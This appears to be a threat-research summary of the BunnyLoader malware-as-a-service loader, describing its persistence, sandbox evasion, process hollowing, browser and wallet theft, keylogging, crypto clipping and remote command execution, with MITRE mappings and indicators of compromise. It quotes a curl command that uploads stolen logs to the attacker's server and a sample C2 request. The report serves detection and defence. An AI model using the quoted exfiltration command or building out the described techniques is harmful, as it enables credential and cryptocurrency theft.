Threat Research

BunnyLoader, the newest Malware-as-a-Service

ZScaler

Zscaler ThreatLabz analyzed BunnyLoader, a rapidly developed C/C++ malware-as-a-service loader that performs persistence, anti-analysis, fileless and on-disk payload delivery, keylogging, browser and wallet credential theft, clipboard clipping, and remote command execution. The loader communicates with a centralized C2 (37[.]139[.]129[.]145) for registration, tasking, exfiltration, and heartbeat signals. #BunnyLoader #Zscaler

Keypoints

  • BunnyLoader is a C/C++ MaaS loader sold on forums and under rapid development with frequent feature updates and bug fixes.
  • It establishes persistence by creating a Run registry value named “Spyware_Blocker” and creates a mutex “BunnyLoader_MUTEXCONTROL”.
  • The loader applies multiple anti-analysis checks (module checks, WMI queries, sandbox usernames, Docker cgroup) and aborts with an error if a sandbox is detected.
  • BunnyLoader registers with a C2 (37[.]139[.]129[.]145), polls for tasks, and supports modules for download-and-execute (fileless and disk), stealer, keylogger, clipper, and remote command execution.
  • Fileless delivery is implemented via a suspended notepad.exe and process hollowing; stolen data is compressed with System.IO.Compression.ZipFile and exfiltrated with curl to the C2.
  • Stealer functionality targets many Chromium-based and other browsers, multiple desktop cryptocurrency wallets, VPN clients (ProtonVPN/OpenVPN), and messaging apps, aggregating logs into BunnyLogs for upload.

MITRE Techniques

  • [T1547.001] Registry Run Keys/Startup Folder – Persists by creating a Run registry value named ‘Spyware_Blocker’ in HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun (‘Creates a new registry value named “Spyware_Blocker” in the Run registry key … where the value is the path to the BunnyLoader binary.’).
  • [T1497] Virtualization/Sandbox Evasion – Detects sandbox/VM environments via module checks, WMI queries, username blacklists and container cgroup checks (‘Performs the following anti-VM techniques:’ and ‘Checks for a Docker container via “/proc/1/cgroup” – if the container exists, BunnyLoader does not perform further malicious actions.’).
  • [T1055.012] Process Hollowing (Process Injection) – Implements fileless execution by creating a suspended notepad.exe and injecting downloaded payload bytes into its memory (‘creates a “notepad.exe” process in a suspended state … performs Process Hollowing to inject the downloaded payload into the “notepad.exe” process’).
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – Uses HTTP GET/POST requests for registration, task retrieval, heartbeat, and result reporting to C2 endpoints (e.g., ‘GET /Bunny/Add.php?… Host: 37[.]139[.]129[.]145’ and other HTTP examples shown).
  • [T1041] Exfiltration Over C2 Channel – Exfiltrates collected data by compressing BunnyLogs into a ZIP and uploading via curl to the C2 (‘cmd.exe /c curl -F “file=@C:UsersuserAppDataLocalBunnyLogs_468325.zip” http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php’).
  • [T1056.001] Keylogging – Implements a basic keylogger using GetAsyncKeyState() and writes keystrokes to ‘C:UsersAppDataLocalKeystrokes.txt’ (‘implements a basic keylogger using GetAsyncKeyState() … stored in the file “C:Users<username>AppDataLocalKeystrokes.txt”’).
  • [T1115] Clipboard Data – Monitors and replaces clipboard contents matching cryptocurrency addresses with actor-controlled addresses (‘clipper checks a victim’s clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.’).
  • [T1555.003] Credentials from Web Browsers – Steals browser autofill, saved passwords, credit cards and history from many Chromium-based and other browser profiles (‘BunnyLoader steals following information from these web browsers: AutoFill data, Credit cards, Downloads, History, Passwords’).
  • [T1059] Command and Scripting Interpreter – Executes remote commands received from C2 using _popen, parsing commands like ‘help’, ‘cd’, ‘pwd’ and returning output to the C2 (‘BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd” and then executes the command using _popen’).

Indicators of Compromise

  • [IP/Domain] C2 server – 37[.]139[.]129[.]145/Bunny/ (used for registration, tasking, uploads, heartbeat, and other endpoints).
  • [URLs/Endpoints] C2 API paths – /Bunny/Add.php, /Bunny/TaskHandler.php, /Bunny/Uploader.php, /Bunny/StealerRegistration.php, /Bunny/Echoer.php (used for registration, task retrieval, exfiltration, stealer registration, and remote commands).
  • [File Hashes] BunnyLoader samples – dbf727e1effc3631ae634d95a0d88bf3, bbf53c2f20ac95a3bc18ea7575f2344b, 59ac3eacd67228850d5478fd3f18df78.
  • [Filenames/Artifacts] Local artifacts – C:UsersAppDataLocalKeystrokes.txt (keylogger output), BunnyLogs_.zip (archived stealer logs) and BunnyLogs folder in AppDataLocal.
  • [Registry] Persistence key – HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun value ‘Spyware_Blocker’ (points to BunnyLoader binary).

BunnyLoader establishes persistence and stealth before contacting its C2. On execution it hides its window, creates the mutex “BunnyLoader_MUTEXCONTROL”, and writes a Run key ‘Spyware_Blocker’ under HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun to maintain startup persistence. The loader runs a suite of anti-analysis checks (module presence checks for security/sandbox DLLs, WMI queries across Win32 classes, Docker cgroup checks, and a blacklist of sandbox usernames) and will abort with a compatibility-style error if a sandbox or VM is detected.

After passing checks, the binary performs HTTP-based registration to the C2 (user agents observed: “BunnyLoader”, “BunnyRequester”), then polls TaskHandler.php for tasks. Tasks map to modules: Trojan Downloader (disk and fileless), Intruder (keylogger and stealer), Clipper (cryptocurrency clipboard replacement), and Remote Command Execution. Fileless delivery uses a suspended notepad.exe and Process Hollowing (injecting the downloaded payload from memory); disk delivery writes the payload to AppDataLocal and executes it. The stealer harvests autofill, passwords, credit cards, downloads, history from numerous Chromium-derived and other browsers, extracts wallet files for many desktop wallets and VPN/messaging credentials, writes collected data to a BunnyLogs folder, compresses it via System.IO.Compression.ZipFile to BunnyLogs_.zip, and uploads via curl to the C2 uploader endpoint.

Keylogging is implemented with GetAsyncKeyState and saved to Keystrokes.txt; the clipper monitors the clipboard and replaces matched crypto addresses (Bitcoin, Monero, Ethereum, Litecoin, Dogecoin, ZCash, Tether) with attacker-provided addresses delivered from C2. Remote commands are retrieved via an echo endpoint, executed locally with _popen (handling commands such as help, cd, pwd), and results are returned to the C2. The loader also issues periodic heartbeat requests to signal online status and sends task-completion and stealer-registration requests (including links to uploaded BunnyLogs) as part of its command-and-control workflow.

Read more: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint